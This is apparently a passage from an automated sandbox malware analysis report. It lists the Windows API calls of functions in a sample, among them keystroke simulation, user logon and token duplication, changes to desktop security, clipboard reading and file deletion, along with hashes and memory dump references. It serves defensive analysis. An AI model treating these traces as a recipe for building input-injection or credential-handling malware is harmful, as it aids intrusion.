                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FB4B20
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00FB4B94
                                                      • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00FB4BE3
                                                      • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00FB4C82
                                                      • wsprintfW.USER32 ref: 00FB4CAE
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FB4CC9
                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00FB4CF1
                                                      • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00FB4D13
                                                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00FB4D33
                                                      • GetWindowTextW.USER32(?,00000000,00000001), ref: 00FB4D5A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
                                                      • String ID: %d/%02d/%02d
                                                      • API String ID: 4054740463-328681919
                                                      • Opcode ID: 3ee3ba6e58a38575562207777c7100609a58ee2794055de06561d4f94e40128e
                                                      • Instruction ID: 81553b5f944e119916037cc0beedd155864f12d4332b2ffa350691c0502f2079
                                                      • Opcode Fuzzy Hash: 3ee3ba6e58a38575562207777c7100609a58ee2794055de06561d4f94e40128e
                                                      • Instruction Fuzzy Hash: B312D071900218ABEB248F26CD49FEE7BB8EF49720F104229F515DB2D2DB74A941EF50
                                                      Function 00F3F98E Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 130keyboardthreadwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 00F3F998
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F7F474
                                                      • IsIconic.USER32(00000000), ref: 00F7F47D
                                                      • ShowWindow.USER32(00000000,00000009), ref: 00F7F48A
                                                      • SetForegroundWindow.USER32(00000000), ref: 00F7F494
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F7F4AA
                                                      • GetCurrentThreadId.KERNEL32 ref: 00F7F4B1
                                                      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F7F4BD
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F7F4CE
                                                      • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F7F4D6
                                                      • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 00F7F4DE
                                                      • SetForegroundWindow.USER32(00000000), ref: 00F7F4E1
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F7F4F6
                                                      • keybd_event.USER32(00000012,00000000), ref: 00F7F501
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F7F50B
                                                      • keybd_event.USER32(00000012,00000000), ref: 00F7F510
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F7F519
                                                      • keybd_event.USER32(00000012,00000000), ref: 00F7F51E
                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F7F528
                                                      • keybd_event.USER32(00000012,00000000), ref: 00F7F52D
                                                      • SetForegroundWindow.USER32(00000000), ref: 00F7F530
                                                      • AttachThreadInput.USER32(?,000000FF,00000000), ref: 00F7F557
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 4125248594-2988720461
                                                      • Opcode ID: 4a3ff44c89f0c1e7578c9cc4c2cd41170d407bc3fc3fb0598c3ac8d6a771a8ea
                                                      • Instruction ID: 58623df970fbcecaf896ecc2c28c7efa4c994b0e738ac140c2f3be4f460c8058
                                                      • Opcode Fuzzy Hash: 4a3ff44c89f0c1e7578c9cc4c2cd41170d407bc3fc3fb0598c3ac8d6a771a8ea
                                                      • Instruction Fuzzy Hash: FD317271E4021CBBEB206BB59C8AFBF7E6DEB44B50F144166FA04E61D1C6B15D00BEA1
                                                      Function 00F81201 Relevance: 38.7, APIs: 19, Strings: 3, Instructions: 241COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F816C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00F8170D
                                                        • Part of subcall function 00F816C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00F8173A
                                                        • Part of subcall function 00F816C3: GetLastError.KERNEL32 ref: 00F8174A
                                                      • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00F81286
                                                      • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00F812A8
                                                      • CloseHandle.KERNEL32(?), ref: 00F812B9
                                                      • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00F812D1
                                                      • GetProcessWindowStation.USER32 ref: 00F812EA
                                                      • SetProcessWindowStation.USER32(00000000), ref: 00F812F4
                                                      • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00F81310
                                                        • Part of subcall function 00F810BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00F811FC), ref: 00F810D4
                                                        • Part of subcall function 00F810BF: CloseHandle.KERNEL32(?,?,00F811FC), ref: 00F810E9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                      • String ID: $default$winsta0
                                                      • API String ID: 22674027-1027155976
                                                      • Opcode ID: c8d6dba5b6b639823925162e646e9337120706810ae4b7328f85414409891bae
                                                      • Instruction ID: e0c8e387ab0e21d9dd2353350f493b4444b332a03f96f5cd12202d0f3e4b52c2
                                                      • Opcode Fuzzy Hash: c8d6dba5b6b639823925162e646e9337120706810ae4b7328f85414409891bae
                                                      • Instruction Fuzzy Hash: 53818871900209ABDF20EFA4DC89FEE7BBDFF05714F144229F911A62A0D7348956EB60
                                                      Function 00F80B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F810F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00F81114
                                                        • Part of subcall function 00F810F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F81120
                                                        • Part of subcall function 00F810F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F8112F
                                                        • Part of subcall function 00F810F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00F80B9B,?,?,?), ref: 00F81136
                                                        • Part of subcall function 00F810F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00F8114D
                                                      • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00F80BCC
                                                      • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00F80C00
                                                      • GetLengthSid.ADVAPI32(?), ref: 00F80C17
                                                      • GetAce.ADVAPI32(?,00000000,?), ref: 00F80C51
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00F80C6D
                                                      • GetLengthSid.ADVAPI32(?), ref: 00F80C84
                                                      • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00F80C8C
                                                      • HeapAlloc.KERNEL32(00000000), ref: 00F80C93
                                                      • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00F80CB4
                                                      • CopySid.ADVAPI32(00000000), ref: 00F80CBB
                                                      • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00F80CEA
                                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00F80D0C
                                                      • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00F80D1E
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F80D45
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80D4C
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F80D55
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80D5C
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F80D65
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80D6C
                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00F80D78
                                                      • HeapFree.KERNEL32(00000000), ref: 00F80D7F
                                                        • Part of subcall function 00F81193: GetProcessHeap.KERNEL32(00000008,00F80BB1,?,00000000,?,00F80BB1,?), ref: 00F811A1
                                                        • Part of subcall function 00F81193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00F80BB1,?), ref: 00F811A8
                                                        • Part of subcall function 00F81193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00F80BB1,?), ref: 00F811B7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                      • String ID:
                                                      • API String ID: 4175595110-0
                                                      • Opcode ID: d3b11ea4488710c9ecf65decebdbec14602038e8f0fb6d195ef6971badd997ad
                                                      • Instruction ID: b8f5dba1e8e3b3991f8722c723f8ee529657037755593c99b7289a6c9d34d7cd
                                                      • Opcode Fuzzy Hash: d3b11ea4488710c9ecf65decebdbec14602038e8f0fb6d195ef6971badd997ad
                                                      • Instruction Fuzzy Hash: 39716A7290020AAFDF50AFA5DC84FEEBBB8BF05350F444615E914E7191DB71A909EFA0
                                                      Function 00F9EAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OpenClipboard.USER32(00FBCC08), ref: 00F9EB29
                                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 00F9EB37
                                                      • GetClipboardData.USER32(0000000D), ref: 00F9EB43
                                                      • CloseClipboard.USER32 ref: 00F9EB4F
                                                      • GlobalLock.KERNEL32(00000000), ref: 00F9EB87
                                                      • CloseClipboard.USER32 ref: 00F9EB91
                                                      • GlobalUnlock.KERNEL32(00000000,00000000), ref: 00F9EBBC
                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 00F9EBC9
                                                      • GetClipboardData.USER32(00000001), ref: 00F9EBD1
                                                      • GlobalLock.KERNEL32(00000000), ref: 00F9EBE2
                                                      • GlobalUnlock.KERNEL32(00000000,?), ref: 00F9EC22
                                                      • IsClipboardFormatAvailable.USER32(0000000F), ref: 00F9EC38
                                                      • GetClipboardData.USER32(0000000F), ref: 00F9EC44
                                                      • GlobalLock.KERNEL32(00000000), ref: 00F9EC55
                                                      • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00F9EC77
                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F9EC94
                                                      • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00F9ECD2
                                                      • GlobalUnlock.KERNEL32(00000000,?,?), ref: 00F9ECF3
                                                      • CountClipboardFormats.USER32 ref: 00F9ED14
                                                      • CloseClipboard.USER32 ref: 00F9ED59
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                      • String ID:
                                                      • API String ID: 420908878-0
                                                      • Opcode ID: d47ad27b5c6df44265713ca629e7020ca3b6911baa8e6ef986cb5a627ce207bb
                                                      • Instruction ID: 451046997a26711ddc3481746fc1a0080a3c0207aab125a9c9352b3a816cf5fd
                                                      • Opcode Fuzzy Hash: d47ad27b5c6df44265713ca629e7020ca3b6911baa8e6ef986cb5a627ce207bb
                                                      • Instruction Fuzzy Hash: 8161D035204206AFE700EF24DC85F6AB7A4EF84714F14461DF456972A2DB71DD05EBA2
                                                      Function 00F9698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F969BE
                                                      • FindClose.KERNEL32(00000000), ref: 00F96A12
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F96A4E
                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F96A75
                                                        • Part of subcall function 00F29CB3: _wcslen.LIBCMT ref: 00F29CBD
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F96AB2
                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F96ADF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                      • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                      • API String ID: 3830820486-3289030164
                                                      • Opcode ID: ca08bd8a5f112f68d6ad314c2139d92f3c4ef025ebaf953e4d8e91171a5d94c6
                                                      • Instruction ID: 1d5a64d43bd3bcdfce7e608ff5e462b4efb59a110c06478ccf430b832192a08d
                                                      • Opcode Fuzzy Hash: ca08bd8a5f112f68d6ad314c2139d92f3c4ef025ebaf953e4d8e91171a5d94c6
                                                      • Instruction Fuzzy Hash: 4ED16172908314AEC710EB60DD91EAFB7ECAF88704F44491DF585C7191EB78DA08DBA2
                                                      Function 00F99642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00F99663
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00F996A1
                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 00F996BB
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00F996D3
                                                      • FindClose.KERNEL32(00000000), ref: 00F996DE
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00F996FA
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F9974A
                                                      • SetCurrentDirectoryW.KERNEL32(00FE6B7C), ref: 00F99768
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F99772
                                                      • FindClose.KERNEL32(00000000), ref: 00F9977F
                                                      • FindClose.KERNEL32(00000000), ref: 00F9978F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                      • String ID: *.*
                                                      • API String ID: 1409584000-438819550
                                                      • Opcode ID: 075f08cb47178dd4558ba113435e765d842d1390a260f8dedcad3a93d5f0d15e
                                                      • Instruction ID: fd135d91897213130085760bca146cc847d565911c56adb19efdcd75c5152084
                                                      • Opcode Fuzzy Hash: 075f08cb47178dd4558ba113435e765d842d1390a260f8dedcad3a93d5f0d15e
                                                      • Instruction Fuzzy Hash: 3731E33290520D6BEF14AFF9DC48ADF37AC9F49320F15425AF914E20A0DBB4DA40AE61
                                                      Function 00F9979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00F997BE
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00F99819
                                                      • FindClose.KERNEL32(00000000), ref: 00F99824
                                                      • FindFirstFileW.KERNEL32(*.*,?), ref: 00F99840
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F99890
                                                      • SetCurrentDirectoryW.KERNEL32(00FE6B7C), ref: 00F998AE
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F998B8
                                                      • FindClose.KERNEL32(00000000), ref: 00F998C5
                                                      • FindClose.KERNEL32(00000000), ref: 00F998D5
                                                        • Part of subcall function 00F8DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F8DB00
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                      • String ID: *.*
                                                      • API String ID: 2640511053-438819550
                                                      • Opcode ID: 0c5353e6e4c12b9ed0801b3e84f4fcc422bf3d6dd72f6f39709c4ccbb8d7d15b
                                                      • Instruction ID: 299f15e3189ba1eb6bdedc5031c95a3ae95d2c7c0e6c902da7d6091750c4e4b6
                                                      • Opcode Fuzzy Hash: 0c5353e6e4c12b9ed0801b3e84f4fcc422bf3d6dd72f6f39709c4ccbb8d7d15b
                                                      • Instruction Fuzzy Hash: E931F63190421D6BEF20EFB9DC48ADE37AC9F46330F55415DE810E20A1DBB0DA44EE60
                                                      Function 00F98195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLocalTime.KERNEL32(?), ref: 00F98257
                                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F98267
                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F98273
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F98310
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F98324
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F98356
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F9838C
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00F98395
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectoryTime$File$Local$System
                                                      • String ID: *.*
                                                      • API String ID: 1464919966-438819550
                                                      • Opcode ID: 2c2b78109ff5184d99116959ddc557495a628097f56cd06c2455eccf3cf04404
                                                      • Instruction ID: c997c5b4d5cea325e3127b66c11a5399fd00c5e10eb70ef93fca5b1509eee1de
                                                      • Opcode Fuzzy Hash: 2c2b78109ff5184d99116959ddc557495a628097f56cd06c2455eccf3cf04404
                                                      • Instruction Fuzzy Hash: 6F6179725083059FDB10EF60D8819AEB3E8FF89360F04492EF989C7251DB35E946DB92
                                                      Function 00F8D076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00F23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F23A97,?,?,00F22E7F,?,?,?,00000000), ref: 00F23AC2
                                                        • Part of subcall function 00F8E199: GetFileAttributesW.KERNEL32(?,00F8CF95), ref: 00F8E19A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00F8D122
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00F8D1DD
                                                      • MoveFileW.KERNEL32(?,?), ref: 00F8D1F0
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F8D20D
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F8D237
                                                        • Part of subcall function 00F8D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00F8D21C,?,?), ref: 00F8D2B2
                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 00F8D253
                                                      • FindClose.KERNEL32(00000000), ref: 00F8D264
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 1946585618-1173974218
                                                      • Opcode ID: 02c5531ac3f5cb9bcdff61619eafa22352162e04a001d960cdbe1127b8254e97
                                                      • Instruction ID: 951172c9645c1f0708716d49738efc139912929b33bd5d8ca48b70270e89e15b
                                                      • Opcode Fuzzy Hash: 02c5531ac3f5cb9bcdff61619eafa22352162e04a001d960cdbe1127b8254e97
                                                      • Instruction Fuzzy Hash: 50615A31C0511DABCF05FBA0EE929EDB7B9AF15300F644165E402B7191EB38AF09EB60
                                                      Function 00F9ED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2047535020.0000000000F21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F20000, based on PE: true
                                                      • Associated: 00000000.00000002.2047520348.0000000000F20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047581108.0000000000FE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047618845.0000000000FEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2047636057.0000000000FF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f20000_0XLuA614VK.jbxd
                                                      Similarity
                                                      • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                      • String ID:
                                                      • API String ID: 1737998785-0
                                                      • Opcode ID: 04489e96c245cd8e1fb3ca42ed25054a4a0b0dd84bac06fe02aa6a73e44125a3
                                                      • Instruction ID: ace9be1c466bcf06575bc5f9feebd5b16edf8dea63c6c435a80a1e3b61f83b94
                                                      • Opcode Fuzzy Hash: 04489e96c245cd8e1fb3ca42ed25054a4a0b0dd84bac06fe02aa6a73e44125a3
                                                      • Instruction Fuzzy Hash: 7B417B35604615AFEB20DF15E888F1ABBA5FF44328F158199E4198BA62C735EC41EBD0
                                                      Function 00F8E8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                      Download Yara Rule
                                                      APIs
